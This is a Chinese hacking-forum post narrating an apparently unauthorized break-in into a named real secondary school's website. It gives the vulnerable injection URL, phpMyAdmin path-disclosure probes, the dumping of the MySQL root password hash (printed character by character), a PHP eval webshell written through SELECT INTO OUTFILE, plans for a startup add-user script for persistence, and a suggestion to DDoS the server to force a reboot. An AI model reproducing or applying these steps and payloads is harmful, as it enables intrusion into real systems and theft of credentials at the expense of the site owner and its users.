找回密码
 立即注册
查看: 3099|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏: _' n; K& L( x/ \7 R
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!" F) |5 B2 E4 i/ f# s% ?

2 `, Z4 \: }8 N& m2 {& R' J/ e" N8 S. t  t6 A7 W, {1 m

# s+ M, @! s) F9 |9 Y+ G" X$ q常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 , m* e$ [8 B! b1 @) D1 s# y0 E

+ {2 |7 F/ x6 F6 v  I0 K8 q1 L- }那么想可以直接写入shell ,getshell有几个条件:
, W# C% B$ E7 m+ ^
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF' H. ?8 G  D& U5 y% H
, W/ C7 M3 @- a0 R( F1 ~+ K" e
试着爆绝对路径:; i0 z4 k( [8 o
1./phpMyAdmin/index.php?lang[]=1  
" L+ S, r% F: R) a: `" J2./phpMyAdmin/phpinfo.php  $ `$ Q1 n  X0 [5 T3 |( X* j
3./load_file()  7 K. S) j+ |3 _6 n$ _3 ]
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  8 M% A5 H" q* A: i# _& A! I; m& ]
5./phpmyadmin/libraries/select_lang.lib.php  ( z) i- J0 U$ y# }1 e( M5 b
6./phpmyadmin/libraries/lect_lang.lib.php  ; A, }- k: ?9 ]
7./phpmyadmin/libraries/mcrypt.lib.php   / k/ Y6 q$ z6 ^/ k. E5 G- o. L; _
8./phpmyadmin/libraries/export/xls.php    l& w) I1 Z' v4 @! q! I! S

, @; ?/ n* Z, z# x1 I均不行...........................
5 R0 l3 B6 E$ d" l6 e$ k8 ?# {" [( o( ]
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
/ Q7 h9 y6 t6 C. o' k# y* Y! `. g5 X- G% C* x
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin ; t6 A4 K! U( \8 c  V  w. |) p
* M6 G9 N1 K; s; q0 L
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败3 P5 E8 J: R' c# v( ~, h

; o. M9 B, c7 A) m( F  g敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........6 ?$ p! q% d# _. [' ^- ^  [: X

5 H0 H' g2 v/ P5 n想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
3 l) {. U- v! u% j
5 H1 k( v# j/ d5 ?( t; rhttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
) ]( k* \- m4 W" j( V5 c+ n; C, D5 i8 m
  J: h+ j7 g! m9 F/ k  U0 J自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
: g- O9 Z9 S; z- V: d
2 P: @& a* ~9 W8 D" r: g1 K% Z成功读到root密码:
" ?. }9 i, C3 E0 F
7 w! b: j  X6 z# y17---- r(0072)
' V/ O, i7 W: x5 g2 f/ L18---- o(006f)
$ h# k. ~( e1 ^0 H$ f) p19---- o(006f)5 A+ h2 E$ i3 q* q7 M( c- i
20---- t(0074)
0 L$ z5 K" R. N1 v1 S8 ]) E) e2 \21---- *(002a)& U3 n% y# R0 Q, C1 M/ D
22---- 8(0038)
) Q( n. M) C2 w8 Y% K0 I8 o23---- 2(0032)" h) Z: I0 n' {+ }5 H1 g8 g; m, H
24---- E(0045)
( `7 M+ }4 {6 E, P: H25---- 1(0031)/ R6 C" q3 Q- [  b: r: s
26---- C(0043)
* M9 U$ E( J! ^' T# l4 |( R27---- 5(0035)
1 @5 m+ G$ t) y( B28---- 8(0038)
9 Y$ v% T4 }6 o! v* i; S1 D! v29---- 2(0032)
4 \) x4 W5 |8 M- {$ f0 Q) s30---- 8(0038)3 q7 P3 o1 \. ?
31---- A(0041)6 W) ^% N. _1 i3 s: Z7 b
32---- 9(0039)
" J1 v& `  ^7 u- R, B33---- B(0042)3 K+ m3 n/ `9 Y- i3 j
34---- 5(0035)
4 Z- R1 j" S  o35---- 4(0034)1 H: w; M  D  i: {$ j
36---- 8(0038)" Y' a. `0 u3 b' V, |4 {1 m2 i$ c0 y" Y
37---- 6(0036)
2 C( ], L4 V- {3 r7 q" Y- T7 l38---- 4(0034)7 g  G; M& u; y# c! }% r& t3 p
39---- 9(0039)
- _0 l  N- Z$ ^3 u6 W, z40---- 1(0031)
7 T/ T. ^7 K; ]4 R( H41---- 1(0031)
3 v& n: ~; g  F! k2 o42---- 5(0035)# T0 U3 Q/ E) R+ _! v& ?* @  H1 [
43---- 3(0033)! ]# m/ j7 R" Y5 z
44---- 5(0035)
5 U# y6 T+ i: q2 |. G8 U45---- 9(0039)4 z  `7 _- Z3 E2 s- b
46---- 8(0038)
+ V  o; Q# D1 x" ?( C  s47---- F(0046)
- Q8 G) Q, |3 M+ [* N  w# b8 L48---- F(0046)6 t# t" k- t5 c# ]
49---- 4(0034)
- h2 Q5 E) `5 ?50---- F(0046)
" j7 ?: S9 x1 \! {8 `51---- 0(0030)* O! q% W+ a3 I1 z
52---- 3(0033)
6 \3 X# J9 z+ M  F) e$ A" F53---- 2(0032)
" _3 L) L$ p" J$ H- E/ p54---- A(0041)& g0 C' T2 L# o) C
55---- 4(0034)
* j% r+ s3 X; f' H" ~- }7 N' b56---- A(0041)
- t- @! A% g4 ]9 U57---- B(0042)
& H5 _' O$ d2 Q5 m% `  T) N58---- *(0044)
4 M' H* `% |" O59---- *(0035)
% j4 a! s) l. H60---- *(0041), A. F1 X& Y2 c% r$ _+ C
61---- *0032)
, {; W: ^4 ~5 o' w, m8 \
6 U" m; e) f. t: d解密后成功登陆phpmyamin8 f1 J' V9 V+ }+ ]; n4 @
                          
4 M" C% q1 G5 a! n# i+ I
) b- i! z) a! T$ ^- U                             
7 T' e& q5 ^* A* z5 R$ l: U3 ?% o# F# Z& h2 K
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'- W1 u/ s2 {8 ~6 I% V1 M

) o: [$ `; a$ N% `  l6 R7 M成功执行,拿下shell,菜刀连接:
# i' l: ~* H% f5 g
" `3 O4 l) w5 B: q3 u' f( k服务器不支持asp,aspx,php提权无果...................
+ Z( z3 T" z* x( E
+ s8 u5 B, v7 y2 O但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
1 D+ v1 u9 O. Q# q& Z( ^
服务器上已经有个隐藏帐号了
  a0 _7 s: I8 N* U3 {
别名     administrators
* e$ u, n- g& d注释     管理员对计算机/域有不受限制的完全访问权

% s* I2 @# S& c( F  P
成员

4 R+ w5 |, q  f, G+ _
-------------------------------------------------------------------------------; ]& G  O6 q% C) Y
admin; X. r8 o" x* k/ G; t' C8 _
Administrator
" N! l: x! I) J. t2 Mslipper$
1 f. g- p) J. Gsqluser
3 F1 ~9 ~6 F' l9 y/ ^2 Q命令成功完成。 + P' I+ J0 l& @( I0 ]' d- [; R% s
; s/ p7 U7 }8 m! h, A. F" u
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。" l* g1 R' c3 }& P+ @

: R+ q1 n& {( {ddos服务器重启,不然就只能坐等服务器重启了...............................4 n1 c4 u# B3 R2 b$ v9 ?6 Z
. J" k# E% @- t# |7 s
      
! Y( Q3 s8 g: F& L6 F1 Q! t

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表